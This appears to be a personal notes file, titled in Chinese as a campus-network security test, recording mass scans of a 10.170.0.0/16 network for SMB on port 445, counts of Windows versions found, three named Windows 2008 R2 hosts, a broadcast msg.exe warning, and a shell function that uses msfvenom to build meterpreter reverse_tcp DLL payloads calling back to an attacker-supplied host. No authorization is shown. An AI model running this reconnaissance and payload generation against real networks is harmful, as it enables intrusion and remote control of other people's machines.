校内网安全测试

➜  ./fmt.sh | wc -l                   
1662
➜  ./fmt.sh | grep "Windows 7" | wc -l
451
➜  ./fmt.sh | grep "Windows 8" | wc -l
378
➜  ./fmt.sh | grep "Windows 10" | wc -l
788
➜  ./fmt.sh | grep "Windows XP" | wc -l
40
➜  ./fmt.sh | grep "Windows 2008" | wc -l
3
➜  ./fmt.sh | grep "Windows 2008"        
[*] 10.170.6.47       - Windows 2008 R2 Standard SP1  (name:WIN-4K4BK0ASC6S) 
[*] 10.170.21.57      - Windows 2008 R2 Enterprise SP1  (name:WIN-5QRE8RSJDPG) 
[*] 10.170.23.233     - Windows 2008 R2 Enterprise SP1  (name:WIN-KN28SU23S2F)
➜ 

➜  grep "Up" nmap_out_2 | wc -l
2732
➜  grep "Windows 7" nmap_out_2 | wc -l
682

#zmap
docker run --privileged --rm -ti -v `pwd`:/tmp dominik/zmap -p 445 10.170.0.0/16 -o /tmp/result

#nmap
nmap --script smb-os-discovery.nse -p445 -iL result 
sudo nmap -O --osscan-guess -Pn -T4 -p 445 -iL result -n -oG out

#msg窗口
msg.exe * "Your System is Vulnerable. Upgrade Your System to Windows 8+, or Turn On Your Fire Wall."

generate_msfvenom () {
	msfvenom -p windows/meterpreter/reverse_tcp LHOST=$1 LPORT=8888 -f dll > go.dll
	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$1 LPORT=8888 -f dll > go_64.dll
}

Nmap done: 1969 IP addresses (1969 hosts up) scanned in 1790.78 seconds
➜  4-19 grep "Windows 7" nmap_scan | wc -l
573